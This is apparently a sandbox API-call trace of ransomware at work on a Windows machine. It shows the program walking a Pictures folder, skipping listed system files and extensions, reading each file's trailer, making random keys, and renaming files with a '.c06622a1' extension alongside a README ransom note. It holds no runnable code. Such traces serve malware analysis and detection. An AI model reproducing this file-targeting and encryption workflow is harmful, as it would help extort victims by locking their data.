CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\_nLNF\\0O88q71.png.c06622a1" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\_nlnf\\0o88q71.png.c06622a1"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x48000000, hTemplateFile=0x0) returned 0x658 [0155.496] CreateIoCompletionPort (FileHandle=0x658, ExistingCompletionPort=0x5e0, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x5e0 [0155.496] RtlAllocateHeap (HeapHandle=0x4c0000, Flags=0x0, Size=0x80104) returned 0x4700020 [0155.502] RtlRandomEx (in: Seed=0xf51018 | out: Seed=0xf51018) returned 0x612e4ac1 [0155.502] RtlRandomEx (in: Seed=0xf51018 | out: Seed=0xf51018) returned 0x31610b86 [0155.502] RtlRandomEx (in: Seed=0xf51018 | out: Seed=0xf51018) returned 0x463445ae [0155.502] RtlRandomEx (in: Seed=0xf51018 | out: Seed=0xf51018) returned 0x44ec0850 [0155.502] RtlRandomEx (in: Seed=0xf51018 | out: Seed=0xf51018) returned 0x5a2834e5 [0155.502] RtlRandomEx (in: Seed=0xf51018 | out: Seed=0xf51018) returned 0x6f0f0f88 [0155.502] RtlRandomEx (in: Seed=0xf51018 | out: Seed=0xf51018) returned 0x2bf889df [0155.503] RtlRandomEx (in: Seed=0xf51018 | out: Seed=0xf51018) returned 0x365193a2 [0155.506] RtlComputeCrc32 (PartialCrc=0xbeef, Buffer=0x4700094, Length=0x80) returned 0x49d51918 [0155.506] RtlComputeCrc32 (PartialCrc=0x1918, Buffer=0x4700094, Length=0x80) returned 0x53b4d149 [0155.506] RtlComputeCrc32 (PartialCrc=0xd149, Buffer=0x4700094, Length=0x80) returned 0x20298add [0155.506] RtlComputeCrc32 (PartialCrc=0x8add, Buffer=0x4700094, Length=0x80) returned 0xf45ad432 [0155.506] RtlComputeCrc32 (PartialCrc=0xd432, Buffer=0x4700094, Length=0x80) returned 0xb2154559 [0155.506] PostQueuedCompletionStatus (CompletionPort=0x5e0, dwNumberOfBytesTransferred=0x0, dwCompletionKey=0x0, lpOverlapped=0x4700020) returned 1 [0155.506] RtlFreeHeap (HeapHandle=0x4c0000, Flags=0x0, BaseAddress=0x4500090) returned 1 [0155.506] RtlFreeHeap (HeapHandle=0x4c0000, Flags=0x0, BaseAddress=0x4510098) returned 1 [0155.506] FindNextFileW (in: hFindFile=0x2db8780, lpFindFileData=0x3fea6c | out: lpFindFileData=0x3fea6c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xaf136980, ftCreationTime.dwHighDateTime=0x1d5e2e9, ftLastAccessTime.dwLowDateTime=0xa374f740, ftLastAccessTime.dwHighDateTime=0x1d5d8f0, ftLastWriteTime.dwLowDateTime=0xa374f740, ftLastWriteTime.dwHighDateTime=0x1d5d8f0, nFileSizeHigh=0x0, nFileSizeLow=0x7bb1, dwReserved0=0x0, dwReserved1=0x0, cFileName="0WmTDpM1z.bmp", cAlternateFileName="0WMTDP~1.BMP")) returned 1 [0155.506] _wcsicmp (_Str1="0WmTDpM1z.bmp", _Str2="README.c06622a1.TXT") returned -66 [0155.506] wcsstr (_Str="0WmTDpM1z.bmp", _SubStr="README") returned 0x0 [0155.506] _wcsicmp (_Str1="autorun.inf", _Str2="0WmTDpM1z.bmp") returned 49 [0155.506] wcslen (_String="autorun.inf") returned 0xb [0155.506] _wcsicmp (_Str1="boot.ini", _Str2="0WmTDpM1z.bmp") returned 50 [0155.506] wcslen (_String="boot.ini") returned 0x8 [0155.506] _wcsicmp (_Str1="bootfont.bin", _Str2="0WmTDpM1z.bmp") returned 50 [0155.506] wcslen (_String="bootfont.bin") returned 0xc [0155.506] _wcsicmp (_Str1="bootsect.bak", _Str2="0WmTDpM1z.bmp") returned 50 [0155.506] wcslen (_String="bootsect.bak") returned 0xc [0155.506] _wcsicmp (_Str1="desktop.ini", _Str2="0WmTDpM1z.bmp") returned 52 [0155.506] wcslen (_String="desktop.ini") returned 0xb [0155.506] _wcsicmp (_Str1="iconcache.db", _Str2="0WmTDpM1z.bmp") returned 57 [0155.506] wcslen (_String="iconcache.db") returned 0xc [0155.506] _wcsicmp (_Str1="ntldr", _Str2="0WmTDpM1z.bmp") returned 62 [0155.506] wcslen (_String="ntldr") returned 0x5 [0155.506] _wcsicmp (_Str1="ntuser.dat", _Str2="0WmTDpM1z.bmp") returned 62 [0155.506] wcslen (_String="ntuser.dat") returned 0xa [0155.507] _wcsicmp (_Str1="ntuser.dat.log", _Str2="0WmTDpM1z.bmp") returned 62 [0155.507] wcslen (_String="ntuser.dat.log") returned 0xe [0155.507] _wcsicmp (_Str1="ntuser.ini", _Str2="0WmTDpM1z.bmp") returned 62 [0155.507] wcslen (_String="ntuser.ini") returned 0xa [0155.507] _wcsicmp (_Str1="thumbs.db", _Str2="0WmTDpM1z.bmp") returned 68 [0155.507] wcslen (_String="thumbs.db") returned 0x9 [0155.507] _wcsicmp (_Str1="386", _Str2="bmp") returned -47 [0155.507] wcslen (_String="386") returned 0x3 [0155.507] _wcsicmp (_Str1="adv", _Str2="bmp") returned -1 [0155.507] wcslen (_String="adv") returned 0x3 [0155.507] _wcsicmp (_Str1="ani", _Str2="bmp") returned -1 [0155.507] wcslen (_String="ani") returned 0x3 [0155.507] _wcsicmp (_Str1="bat", _Str2="bmp") returned -12 [0155.507] wcslen (_String="bat") returned 0x3 [0155.507] _wcsicmp (_Str1="bin", _Str2="bmp") returned -4 [0155.507] wcslen (_String="bin") returned 0x3 [0155.507] _wcsicmp (_Str1="cab", _Str2="bmp") returned 1 [0155.507] wcslen (_String="cab") returned 0x3 [0155.507] _wcsicmp (_Str1="cmd", _Str2="bmp") returned 1 [0155.507] wcslen (_String="cmd") returned 0x3 [0155.507] _wcsicmp (_Str1="com", _Str2="bmp") returned 1 [0155.507] wcslen (_String="com") returned 0x3 [0155.507] _wcsicmp (_Str1="cpl", _Str2="bmp") returned 1 [0155.507] wcslen (_String="cpl") returned 0x3 [0155.507] _wcsicmp (_Str1="cur", _Str2="bmp") returned 1 [0155.507] wcslen (_String="cur") returned 0x3 [0155.507] _wcsicmp (_Str1="deskthemepack", _Str2="bmp") returned 2 [0155.507] wcslen (_String="deskthemepack") returned 0xd [0155.507] _wcsicmp (_Str1="diagcab", _Str2="bmp") returned 2 [0155.507] wcslen (_String="diagcab") returned 0x7 [0155.508] _wcsicmp (_Str1="diagcfg", _Str2="bmp") returned 2 [0155.508] wcslen (_String="diagcfg") returned 0x7 [0155.508] _wcsicmp (_Str1="diagpkg", _Str2="bmp") returned 2 [0155.508] wcslen (_String="diagpkg") returned 0x7 [0155.508] _wcsicmp (_Str1="dll", _Str2="bmp") returned 2 [0155.508] wcslen (_String="dll") returned 0x3 [0155.508] _wcsicmp (_Str1="drv", _Str2="bmp") returned 2 [0155.508] wcslen (_String="drv") returned 0x3 [0155.508] _wcsicmp (_Str1="exe", _Str2="bmp") returned 3 [0155.508] wcslen (_String="exe") returned 0x3 [0155.508] _wcsicmp (_Str1="hlp", _Str2="bmp") returned 6 [0155.508] wcslen (_String="hlp") returned 0x3 [0155.508] _wcsicmp (_Str1="icl", _Str2="bmp") returned 7 [0155.508] wcslen (_String="icl") returned 0x3 [0155.508] _wcsicmp (_Str1="icns", _Str2="bmp") returned 7 [0155.508] wcslen (_String="icns") returned 0x4 [0155.508] _wcsicmp (_Str1="ico", _Str2="bmp") returned 7 [0155.508] wcslen (_String="ico") returned 0x3 [0155.508] _wcsicmp (_Str1="ics", _Str2="bmp") returned 7 [0155.508] wcslen (_String="ics") returned 0x3 [0155.508] _wcsicmp (_Str1="idx", _Str2="bmp") returned 7 [0155.508] wcslen (_String="idx") returned 0x3 [0155.508] _wcsicmp (_Str1="ldf", _Str2="bmp") returned 10 [0155.508] wcslen (_String="ldf") returned 0x3 [0155.508] _wcsicmp (_Str1="lnk", _Str2="bmp") returned 10 [0155.508] wcslen (_String="lnk") returned 0x3 [0155.508] _wcsicmp (_Str1="mod", _Str2="bmp") returned 11 [0155.508] wcslen (_String="mod") returned 0x3 [0155.508] _wcsicmp (_Str1="mpa", _Str2="bmp") returned 11 [0155.508] wcslen (_String="mpa") returned 0x3 [0155.508] _wcsicmp (_Str1="msc", _Str2="bmp") returned 11 [0155.509] wcslen (_String="msc") returned 0x3 [0155.509] _wcsicmp (_Str1="msp", _Str2="bmp") returned 11 [0155.509] wcslen (_String="msp") returned 0x3 [0155.509] _wcsicmp (_Str1="msstyles", _Str2="bmp") returned 11 [0155.509] wcslen (_String="msstyles") returned 0x8 [0155.509] _wcsicmp (_Str1="msu", _Str2="bmp") returned 11 [0155.509] wcslen (_String="msu") returned 0x3 [0155.509] _wcsicmp (_Str1="nls", _Str2="bmp") returned 12 [0155.509] wcslen (_String="nls") returned 0x3 [0155.509] _wcsicmp (_Str1="nomedia", _Str2="bmp") returned 12 [0155.509] wcslen (_String="nomedia") returned 0x7 [0155.509] _wcsicmp (_Str1="ocx", _Str2="bmp") returned 13 [0155.509] wcslen (_String="ocx") returned 0x3 [0155.509] _wcsicmp (_Str1="prf", _Str2="bmp") returned 14 [0155.509] wcslen (_String="prf") returned 0x3 [0155.509] _wcsicmp (_Str1="ps1", _Str2="bmp") returned 14 [0155.509] wcslen (_String="ps1") returned 0x3 [0155.509] _wcsicmp (_Str1="rom", _Str2="bmp") returned 16 [0155.509] wcslen (_String="rom") returned 0x3 [0155.509] _wcsicmp (_Str1="rtp", _Str2="bmp") returned 16 [0155.509] wcslen (_String="rtp") returned 0x3 [0155.509] _wcsicmp (_Str1="scr", _Str2="bmp") returned 17 [0155.509] wcslen (_String="scr") returned 0x3 [0155.509] _wcsicmp (_Str1="shs", _Str2="bmp") returned 17 [0155.509] wcslen (_String="shs") returned 0x3 [0155.509] _wcsicmp (_Str1="spl", _Str2="bmp") returned 17 [0155.509] wcslen (_String="spl") returned 0x3 [0155.509] _wcsicmp (_Str1="sys", _Str2="bmp") returned 17 [0155.509] wcslen (_String="sys") returned 0x3 [0155.509] _wcsicmp (_Str1="theme", _Str2="bmp") returned 18 [0155.509] wcslen (_String="theme") returned 0x5 [0155.510] _wcsicmp (_Str1="themepack", _Str2="bmp") returned 18 [0155.510] wcslen (_String="themepack") returned 0x9 [0155.510] _wcsicmp (_Str1="wpx", _Str2="bmp") returned 21 [0155.510] wcslen (_String="wpx") returned 0x3 [0155.510] _wcsicmp (_Str1="lock", _Str2="bmp") returned 10 [0155.510] wcslen (_String="lock") returned 0x4 [0155.510] _wcsicmp (_Str1="key", _Str2="bmp") returned 9 [0155.510] wcslen (_String="key") returned 0x3 [0155.510] _wcsicmp (_Str1="hta", _Str2="bmp") returned 6 [0155.510] wcslen (_String="hta") returned 0x3 [0155.510] _wcsicmp (_Str1="msi", _Str2="bmp") returned 11 [0155.510] wcslen (_String="msi") returned 0x3 [0155.510] _wcsicmp (_Str1="pdb", _Str2="bmp") returned 14 [0155.510] wcslen (_String="pdb") returned 0x3 [0155.510] _wcsicmp (_Str1="sql", _Str2="bmp") returned 17 [0155.510] wcslen (_String="sql") returned 0x3 [0155.510] _wcsicmp (_Str1="sqlite", _Str2="bmp") returned 17 [0155.510] wcslen (_String="sqlite") returned 0x6 [0155.510] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\_nLNF" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\_nlnf")) returned 0x10 [0155.510] RtlAllocateHeap (HeapHandle=0x4c0000, Flags=0x0, Size=0x10000) returned 0x4500090 [0155.510] wcscpy (in: _Dest=0x4500090, _Source="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\_nLNF" | out: _Dest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\_nLNF") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\_nLNF" [0155.510] wcslen (_String="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\_nLNF") returned 0x30 [0155.510] wcscpy (in: _Dest=0x45000f2, _Source="0WmTDpM1z.bmp" | out: _Dest="0WmTDpM1z.bmp") returned="0WmTDpM1z.bmp" [0155.510] SetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\_nLNF\\0WmTDpM1z.bmp", dwFileAttributes=0x80) returned 1 [0155.519] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\_nLNF\\0WmTDpM1z.bmp" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\_nlnf\\0wmtdpm1z.bmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x65c [0155.519] SetFilePointerEx (in: hFile=0x65c, liDistanceToMove=0xffffff70, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0155.519] ReadFile (in: hFile=0x65c, lpBuffer=0x3fe8f4, nNumberOfBytesToRead=0x90, lpNumberOfBytesRead=0x3fe984, lpOverlapped=0x0 | out: lpBuffer=0x3fe8f4*, lpNumberOfBytesRead=0x3fe984*=0x90, lpOverlapped=0x0) returned 1 [0155.520] RtlComputeCrc32 (PartialCrc=0xbeef, Buffer=0x3fe8f4, Length=0x80) returned 0xf956842 [0155.520] RtlComputeCrc32 (PartialCrc=0x6842, Buffer=0x3fe8f4, Length=0x80) returned 0x87c803b9 [0155.520] RtlComputeCrc32 (PartialCrc=0x3b9, Buffer=0x3fe8f4, Length=0x80) returned 0xf616d512 [0155.520] RtlComputeCrc32 (PartialCrc=0xd512, Buffer=0x3fe8f4, Length=0x80) returned 0x35174582 [0155.520] RtlComputeCrc32 (PartialCrc=0x4582, Buffer=0x3fe8f4, Length=0x80) returned 0x92df9e24 [0155.520] CloseHandle (hObject=0x65c) returned 1 [0155.520] RtlAllocateHeap (HeapHandle=0x4c0000, Flags=0x0, Size=0x10000) returned 0x4510098 [0155.520] wcscpy (in: _Dest=0x4510098, _Source="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\_nLNF\\0WmTDpM1z.bmp" | out: _Dest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\_nLNF\\0WmTDpM1z.bmp") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\_nLNF\\0WmTDpM1z.bmp" [0155.520] wcslen (_String="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\_nLNF\\0WmTDpM1z.bmp") returned 0x3e [0155.520] wcscpy (in: _Dest=0x4510114, _Source=".c06622a1" | out: _Dest=".c06622a1") returned=".c06622a1" [0155.520] MoveFileExW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\_nLNF\\0WmTDpM1z.bmp" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\_nlnf\\0wmtdpm1z.bmp"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\_nLNF\\0WmTDpM1z.bmp.c06622a1" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\_nlnf\\0wmtdpm1z.bmp.c06622a1"), dwFlags=0x8) returned 1 [0155.530] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\_nLNF\\0WmTDpM1z.bmp.c06622a1" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\_nlnf\\0wmtdpm1z.bmp.c06622a1"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x48000000, hTemplateFile=0x0) returned 0x65c [0155.530] CreateIoCompletionPort (FileHandle=0x65c, ExistingCompletionPort=0x5dc, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x5dc [0155.531] RtlAllocateHeap (HeapHandle=0x4c0000, Flags=0x0, Size=0x80104) returned 0x2880020 [0155.536] RtlRandomEx (in: Seed=0xf51018 | out: Seed=0xf51018) returned 0x314cb493 [0155.536] RtlRandomEx (in: Seed=0xf51018 | out: Seed=0xf51018) returned 0x3e7f1ee [0155.536] RtlRandomEx (in: Seed=0xf51018 | out: Seed=0xf51018) returned 0x6a0cc491 [0155.536] RtlRandomEx (in: Seed=0xf51018 | out: Seed=0xf51018) returned 0x7670f7e2 [0155.536] RtlRandomEx (in: Seed=0xf51018 | out: Seed=0xf51018) returned 0x3089f3fb [0155.536] RtlRandomEx (in: Seed=0xf51018 | out: Seed=0xf51018) returned 0x5dc11fe [0155.536] RtlRandomEx (in: Seed=0xf51018 | out: Seed=0xf51018) returned 0x24af79d [0155.536] RtlRandomEx (in: Seed=0xf51018 | out: Seed=0xf51018) returned 0xb906b10 [0155.539] RtlComputeCrc32 (PartialCrc=0xbeef, Buffer=0x2880094, Length=0x80) returned 0xf79f05e2 [0155.539] RtlComputeCrc32 (PartialCrc=0x5e2, Buffer=0x2880094, Length=0x80) returned 0x48ad0e93 [0155.539] RtlComputeCrc32 (PartialCrc=0xe93, Buffer=0x2880094, Length=0x80) returned 0x34b11c1f [0155.539] RtlComputeCrc32 (PartialCrc=0x1c1f, Buffer=0x2880094, Length=0x80) returned 0xc5df9d84 [0155.539] RtlComputeCrc32 (PartialCrc=0x9d84, Buffer=0x2880094, Length=0x80) returned 0xd8171177 [0155.539] PostQueuedCompletionStatus (CompletionPort=0x5dc, dwNumberOfBytesTransferred=0x0, dwCompletionKey=0x0, lpOverlapped=0x2880020) returned 1 [0155.539] RtlFreeHeap (HeapHandle=0x4c0000, Flags=0x0, BaseAddress=0x4500090) returned 1 [0155.539] RtlFreeHeap (HeapHandle=0x4c0000, Flags=0x0, BaseAddress=0x4510098) returned 1 [0155.539] FindNextFileW (in: hFindFile=0x2db8780, lpFindFileData=0x3fea6c | out: lpFindFileData=0x3fea6c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x897d6690, ftCreationTime.dwHighDateTime=0x1d5dd1b, ftLastAccessTime.dwLowDateTime=0xbe5e7020, ftLastAccessTime.dwHighDateTime=0x1d5e3ba, ftLastWriteTime.dwLowDateTime=0xbe5e7020, ftLastWriteTime.dwHighDateTime=0x1d5e3ba, nFileSizeHigh=0x0, nFileSizeLow=0xce03, dwReserved0=0x0, dwReserved1=0x0, cFileName="43yp.bmp", cAlternateFileName="")) returned 1 [0155.540] _wcsicmp (_Str1="43yp.bmp", _Str2="README.c06622a1.TXT") returned -62 [0155.540] wcsstr (_Str="43yp.bmp", _SubStr="README") returned 0x0 [0155.540] _wcsicmp (_Str1="autorun.inf", _Str2="43yp.bmp") returned 45 [0155.540] wcslen (_String="autorun.inf") returned 0xb [0155.540] _wcsicmp (_Str1="boot.ini", _Str2="43yp.bmp") returned 46 [0155.540] wcslen (_String="boot.ini") returned 0x8 [0155.540] _wcsicmp (_Str1="bootfont.bin", _Str2="43yp.bmp") returned 46 [0155.540] wcslen (_String="bootfont.bin") returned 0xc [0155.540] _wcsicmp (_Str1="bootsect.bak", _Str2="43yp.bmp") returned 46 [0155.540] wcslen (_String="bootsect.bak") returned 0xc [0155.540] _wcsicmp (_Str1="desktop.ini", _Str2="43yp.bmp") returned 48 [0155.540] wcslen (_String="desktop.ini") returned 0xb [0155.540] _wcsicmp (_Str1="iconcache.db", _Str2="43yp.bmp") returned 53 [0155.540] wcslen (_String="iconcache.db") returned 0xc [0155.540] _wcsicmp (_Str1="ntldr", _Str2="43yp.bmp") returned 58 [0155.540] wcslen (_String="ntldr") returned 0x5 [0155.540] _wcsicmp (_Str1="ntuser.dat", _Str2="43yp.bmp") returned 58 [0155.540] wcslen (_String="ntuser.dat") returned 0xa [0155.540] _wcsicmp (_Str1="ntuser.dat.log", _Str2="43yp.bmp") returned 58 [0155.540] wcslen (_String="ntuser.dat.log") returned 0xe [0155.540] _wcsicmp (_Str1="ntuser.ini", _Str2="43yp.bmp") returned 58 [0155.540] wcslen (_String="ntuser.ini") returned 0xa [0155.540] _wcsicmp (_Str1="thumbs.db", _Str2="43yp.bmp") returned 64 [0155.540] wcslen (_String="thumbs.db") returned 0x9 [0155.540] _wcsicmp (_Str1="386", _Str2="bmp") returned -47 [0155.540] wcslen (_String="386") returned 0x3 [0155.540] _wcsicmp (_Str1="adv", _Str2="bmp") returned -1 [0155.540] wcslen (_String="adv") returned 0x3 [0155.540] _wcsicmp (_Str1="ani", _Str2="bmp") returned -1 [0155.540] wcslen (_String="ani") returned 0x3 [0155.540] _wcsicmp (_Str1="bat", _Str2="bmp") returned -12 [0155.540] wcslen (_String="bat") returned 0x3 [0155.540] _wcsicmp (_Str1="bin", _Str2="bmp") returned -4 [0155.540] wcslen (_String="bin") returned 0x3 [0155.540] _wcsicmp (_Str1="cab", _Str2="bmp") returned 1 [0155.540] wcslen (_String="cab") returned 0x3 [0155.541] _wcsicmp (_Str1="cmd", _Str2="bmp") returned 1 [0155.541] wcslen (_String="cmd") returned 0x3 [0155.541] _wcsicmp (_Str1="com", _Str2="bmp") returned 1 [0155.541] wcslen (_String="com") returned 0x3 [0155.541] _wcsicmp (_Str1="cpl", _Str2="bmp") returned 1 [0155.541] wcslen (_String="cpl") returned 0x3 [0155.541] _wcsicmp (_Str1="cur", _Str2="bmp") returned 1 [0155.541] wcslen (_String="cur") returned 0x3 [0155.541] _wcsicmp (_Str1="deskthemepack", _Str2="bmp") returned 2 [0155.541] wcslen (_String="deskthemepack") returned 0xd [0155.541] _wcsicmp (_Str1="diagcab", _Str2="bmp") returned 2 [0155.541] wcslen (_String="diagcab") returned 0x7 [0155.541] _wcsicmp (_Str1="diagcfg", _Str2="bmp") returned 2 [0155.541] wcslen (_String="diagcfg") returned 0x7 [0155.541] _wcsicmp (_Str1="diagpkg", _Str2="bmp") returned 2 [0155.541] wcslen (_String="diagpkg") returned 0x7 [0155.541] _wcsicmp (_Str1="dll", _Str2="bmp") returned 2 [0155.541] wcslen (_String="dll") returned 0x3 [0155.541] _wcsicmp (_Str1="drv", _Str2="bmp") returned 2 [0155.541] wcslen (_String="drv") returned 0x3 [0155.541] _wcsicmp (_Str1="exe", _Str2="bmp") returned 3 [0155.541] wcslen (_String="exe") returned 0x3 [0155.541] _wcsicmp (_Str1="hlp", _Str2="bmp") returned 6 [0155.541] wcslen (_String="hlp") returned 0x3 [0155.541] _wcsicmp (_Str1="icl", _Str2="bmp") returned 7 [0155.541] wcslen (_String="icl") returned 0x3 [0155.541] _wcsicmp (_Str1="icns", _Str2="bmp") returned 7 [0155.541] wcslen (_String="icns") returned 0x4 [0155.541] _wcsicmp (_Str1="ico", _Str2="bmp") returned 7 [0155.541] wcslen (_String="ico") returned 0x3 [0155.541] _wcsicmp (_Str1="ics", _Str2="bmp") returned 7 [0155.541] wcslen (_String="ics") returned 0x3 [0155.541] _wcsicmp (_Str1="idx", _Str2="bmp") returned 7 [0155.541] wcslen (_String="idx") returned 0x3 [0155.541] _wcsicmp (_Str1="ldf", _Str2="bmp") returned 10 [0155.541] wcslen (_String="ldf") returned 0x3 [0155.541] _wcsicmp (_Str1="lnk", _Str2="bmp") returned 10 [0155.542] wcslen (_String="lnk") returned 0x3 [0155.542] _wcsicmp (_Str1="mod", _Str2="bmp") returned 11 [0155.542] wcslen (_String="mod") returned 0x3 [0155.542] _wcsicmp (_Str1="mpa", _Str2="bmp") returned 11 [0155.542] wcslen (_String="mpa") returned 0x3 [0155.542] _wcsicmp (_Str1="msc", _Str2="bmp") returned 11 [0155.542] wcslen (_String="msc") returned 0x3 [0155.542] _wcsicmp (_Str1="msp", _Str2="bmp") returned 11 [0155.542] wcslen (_String="msp") returned 0x3 [0155.542] _wcsicmp (_Str1="msstyles", _Str2="bmp") returned 11 [0155.542] wcslen (_String="msstyles") returned 0x8 [0155.542] _wcsicmp (_Str1="msu", _Str2="bmp") returned 11 [0155.542] wcslen (_String="msu") returned 0x3 [0155.542] _wcsicmp (_Str1="nls", _Str2="bmp") returned 12 [0155.542] wcslen (_String="nls") returned 0x3 [0155.542] _wcsicmp (_Str1="nomedia", _Str2="bmp") returned 12 [0155.542] wcslen (_String="nomedia") returned 0x7 [0155.542] _wcsicmp (_Str1="ocx", _Str2="bmp") returned 13 [0155.542] wcslen (_String="ocx") returned 0x3 [0155.542] _wcsicmp (_Str1="prf", _Str2="bmp") returned 14 [0155.542] wcslen (_String="prf") returned 0x3 [0155.542] _wcsicmp (_Str1="ps1", _Str2="bmp") returned 14 [0155.542] wcslen (_String="ps1") returned 0x3 [0155.542] _wcsicmp (_Str1="rom", _Str2="bmp") returned 16 [0155.542] wcslen (_String="rom") returned 0x3 [0155.542] _wcsicmp (_Str1="rtp", _Str2="bmp") returned 16 [0155.542] wcslen (_String="rtp") returned 0x3 [0155.542] _wcsicmp (_Str1="scr", _Str2="bmp") returned 17 [0155.542] wcslen (_String="scr") returned 0x3 [0155.542] _wcsicmp (_Str1="shs", _Str2="bmp") returned 17 [0155.542] wcslen (_String="shs") returned 0x3 [0155.542] _wcsicmp (_Str1="spl", _Str2="bmp") returned 17 [0155.542] wcslen (_String="spl") returned 0x3 [0155.542] _wcsicmp (_Str1="sys", _Str2="bmp") returned 17 [0155.542] wcslen (_String="sys") returned 0x3 [0155.542] _wcsicmp (_Str1="theme", _Str2="bmp") returned 18 [0155.542] wcslen (_String="theme") returned 0x5 [0155.542] _wcsicmp (_Str1="themepack", _Str2="bmp") returned 18 [0155.542] wcslen (_String="themepack") returned 0x9 [0155.543] _wcsicmp (_Str1="wpx", _Str2="bmp") returned 21 [0155.543] wcslen (_String="wpx") returned 0x3 [0155.543] _wcsicmp (_Str1="lock", _Str2="bmp") returned 10 [0155.543] wcslen (_String="lock") returned 0x4 [0155.543] _wcsicmp (_Str1="key", _Str2="bmp") returned 9 [0155.543] wcslen (_String="key") returned 0x3 [0155.543] _wcsicmp (_Str1="hta", _Str2="bmp") returned 6 [0155.543] wcslen (_String="hta") returned 0x3 [0155.543] _wcsicmp (_Str1="msi", _Str2="bmp") returned 11 [0155.543] wcslen (_String="msi") returned 0x3 [0155.543] _wcsicmp (_Str1="pdb", _Str2="bmp") returned 14 [0155.543] wcslen (_String="pdb") returned 0x3 [0155.543] _wcsicmp (_Str1="sql", _Str2="bmp") returned 17 [0155.543] wcslen (_String="sql") returned 0x3 [0155.543] _wcsicmp (_Str1="sqlite", _Str2="bmp") returned 17 [0155.543] wcslen (_String="sqlite") returned 0x6 [0155.543] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\_nLNF" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\_nlnf")) returned 0x10 [0155.543] RtlAllocateHeap (HeapHandle=0x4c0000, Flags=0x0, Size=0x10000) returned 0x4500090 [0155.543] wcscpy (in: _Dest=0x4500090, _Source="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\_nLNF" | out: _Dest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\_nLNF") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\_nLNF" [0155.543] wcslen (_String="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\_nLNF") returned 0x30 [0155.543] wcscpy (in: _Dest=0x45000f2, _Source="43yp.bmp" | out: _Dest="43yp.bmp") returned="43yp.bmp" [0155.543] SetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\_nLNF\\43yp.bmp", dwFileAttributes=0x80) returned 1 [0155.543] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\_nLNF\\43yp.bmp" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\_nlnf\\43yp.bmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a8 [0155.543] SetFilePointerEx (in: hFile=0x1a8, liDistanceToMove=0xffffff70, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0155.544] ReadFile (in: hFile=0x1a8, lpBuffer=0x3fe8f4, nNumberOfBytesToRead=0x90, lpNumberOfBytesRead=0x3fe984, lpOverlapped=0x0 | out: lpBuffer=0x3fe8f4*, lpNumberOfBytesRead=0x3fe984*=0x90, lpOverlapped=0x0) returned 1 [0155.544] RtlComputeCrc32 (PartialCrc=0xbeef, Buffer=0x3fe8f4, Length=0x80) returned 0x1ccc432e [0155.544] RtlComputeCrc32 (PartialCrc=0x432e, Buffer=0x3fe8f4, Length=0x80) returned 0x4e24fea3 [0155.544] RtlComputeCrc32 (PartialCrc=0xfea3, Buffer=0x3fe8f4, Length=0x80) returned 0xf1756819 [0155.544] RtlComputeCrc32 (PartialCrc=0x6819, Buffer=0x3fe8f4, Length=0x80) returned 0xf1d380f8 [0155.544] RtlComputeCrc32 (PartialCrc=0x80f8, Buffer=0x3fe8f4, Length=0x80) returned 0xec1bca4a [0155.544] CloseHandle (hObject=0x1a8) returned 1 [0155.544] RtlAllocateHeap (HeapHandle=0x4c0000, Flags=0x0, Size=0x10000) returned 0x4510098 